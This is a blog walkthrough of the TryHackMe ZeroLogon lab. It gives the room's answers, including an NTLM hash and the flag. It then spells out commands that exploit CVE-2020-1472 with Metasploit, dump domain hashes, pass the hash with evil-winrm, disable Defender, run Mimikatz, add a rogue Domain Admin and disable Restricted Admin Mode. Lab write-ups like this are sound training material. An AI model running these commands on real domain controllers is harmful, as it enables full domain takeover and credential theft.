TL;DR How to complete the TryHackMe ZeroLogon room without having to tweak or even use the provided PoC code. This room is part of the Cyber Defense pathway.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
This is a guide for those who like to take the simple path if possible. The TryHackMe room ZeroLogon located here wants you to go through, tweak, and use some PoC Python code available here.
We didn’t bother with all that. We simply used some common enumeration methods to gather the target VM’s ComputerName and domain name, then fired up Metasploit and fed that information into the module for exploiting ZeroLogon.
We also got some good hands on practice with Restricted Admin Mode and noticed that TryHackMe mixed up the builtin Administrator with the DSRM Administrator. They called both the “Local Administrator”, which doesn’t exist on a DC.
The ZeroLogon TryHackMe room has a well written description of the vulnerability so we won’t bother rehashing that here. Suffice to say that ZeroLogon was classified as CVE-2020–1472, and along with other infamous 0 Days such as EternalBlue remains an important lesson in how critical prompt patching is. ZeroLogon took advantage of an oversight in Microsoft’s implementation of a protocol and allowed attackers to simply brute force a value that only had 256 possible values. Once they did this they could reset a DC’s password to whatever value they wanted.
Answers to TryHackMe’s Questions
We will lead with the TryHackMe questions and do the walkthrough afterwards.
What method will allow us to change Passwords over NRPC?
NetrServerPasswordSet2
What are the required fields for the method per the Microsoft Documentation?
PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword
What Opnumber is the Method?
30
What is the NetBIOS name of the Domain Controller?
DC01
What is the NetBIOS name of the network?
HOLOLIVE
What domain are you attacking?
Hololive.local
What is the Local Administrator’s NTLM hash?
3f3ef89114fb063e3d7fc23c20f65568
How many Domain Admin accounts are there?
2
What is the root flag?
THM{Zer0Log0nD4rkTh1rty}
How we found the answers to the academic questions
We Googled NetrServerAuthenticate3 and found the Microsoft documentation right away. Skim through the topics and one will notice the page covering NetrServerPasswordSet2 with the Opnum and required fields.
Walkthrough of the attack
Alright, now that the theory is out of the way we can get to the fun, interesting stuff :)
We started by firing up Metasploit, confirming that it has a module for ZeroLogon, and checking what options we have to set to execute the attack.
msfconsole
search zerologon
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
show options
set RHOSTS 10.10.140.185
set NBNAME DC01
How did we know the target’s ComputerName and domain name?
We ran nmap and enum4linux on the target’s IP address, however this did not yield the required information.
However running xfreerdp did :P
xfreerdp /v:10.10.140.185 /u:administrator
This was all the information we needed to run the Metasploit exploit and reset the DC’s password to blank.
We then ran secretsdump using the DC’s credentials. Just remember that you have to escape the $ in BASH, hence the \ .
cd /home/kali/Downloads/impacket-master/examples
python3 secretsdump.py -just-dc-ntlm hololive/DC01\$@10.10.140.185
We can then PTH as the Administrator using evil-winrm.
evil-winrm -i 10.10.140.185 -u administrator -H 3f3ef89114fb063e3d7fc23c20f65568
Get-ChildItem ..\Desktop
Get-Content ..\Desktop\root.txt
We can get the number of Domain Admins by querying AD.
(Get-ADGroup “Domain Admins” –Properties *).Member
But wait, there’s 3 Domain Admins and TryHackMe didn’t mark our answer correct until we lowered that number to 2.
They also asked for the “Local Administrator’s” NTLM. They didn’t ask for the builtin Administrator’s. What gives?
What TryHackMe got wrong
We went over this back in Back to Basics Part I after an IT certification got this wrong. That certification organization confused the SAM on a DC with NTDS.dit.
TryHackMe seems to be confusing the DSRM Administrator account with the builtin Administrator account, aka well known SID 500. They are under the mistaken belief that the builtin Administrator account that we PTH with is a “local admin” on the DC. Hence the answer of 2 as to “how many Domain Admin accounts are there?”.
This is not true. That account is a Domain Admin, one could say that they are The Domain Admin.
I’m probably preaching to the choir, but when one stands up the first DC in a new domain the former local administrator account of that former standalone Windows Server automatically becomes the Administrator and a Domain Admin.
This is why Windows prompts you for a password for the DSRM account during promotion to DC. The DSRM account is NOT the same thing as the Administrator. One can clearly see this if one dumps the SAM on a DC.
(Mimikatz cheatsheet is here.)
Set-MpPreference -DisableRealTimeMonitoring $true
upload /home/kali/Downloads/exploits/PowerShell/Invoke-Mimikatz.ps1
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::sam"'
- The DSRM account is in the SAM.
- The Administrator account, along with all AD accounts, is in NTDS.dit.
- Neither the DSRM account or the Administrator are a local admin, there’s no such thing on a DC.
One could argue that this is just semantics, however there is a persistence mechanism involving changing the default configuration of the DSRM account, therefore the distinction is something cyber folks should be aware of.
Restricted Admin Mode
As I’m sure others did, I initially attempted to PTH with xfreerdp.
xfreerdp /v:10.10.140.185 /u:administrator /pth:3f3ef89114fb063e3d7fc23c20f65568However Restricted Admin Mode prevented this from working.
This can be set in Group Policy under:
Computer Configuration\Policies\Administrative Templates\System\Credentials DelegationSet “Restrict delegation of credentials to remote servers” to Enabled.
If one wants to RDP one can either create a new Domain Admin account with a known password and login to RDP using it:
New-ADUser -Name "Mishky" -AccountPassword(ConvertTo-SecureString -AsPlainText "Password00" -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members "Mishky"Alternatively one can disable Restricted Admin Mode by setting a registry key while logged in via evil-winrm.
New-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Lsa -name ‘DisableRestrictedAdmin’ -PropertyType ‘DWORD’ -value ‘0’ -forceFollowing this we can get a nice pretty GUI.
Summary
In our opinion old 0 Days make great teaching tools. TryHackMe did a good job on this room and they threw in a nice twist with Restricted Admin Mode.
They seem to have confused the builtin Administrator account with the “Local Administrator” account, but it’s a small complaint.
References
NetrServerAuthenticate3: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9
NetrServerPasswordSet2: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81
Stops PTH over RDP: https://www.systemconf.com/2021/03/17/what-is-restricted-admin-mode-and-what-does-it-do/
Create a new registry key: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.3
PTH with xfreerdp after disabling Restricted Admin Mode: https://medium.com/@jakemcgreevy/pass-the-hash-pth-with-rdp-80595fb38bef
AD well known SIDs: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
Sneaky AD Persistence #13: DSRM: https://adsecurity.org/?p=1785
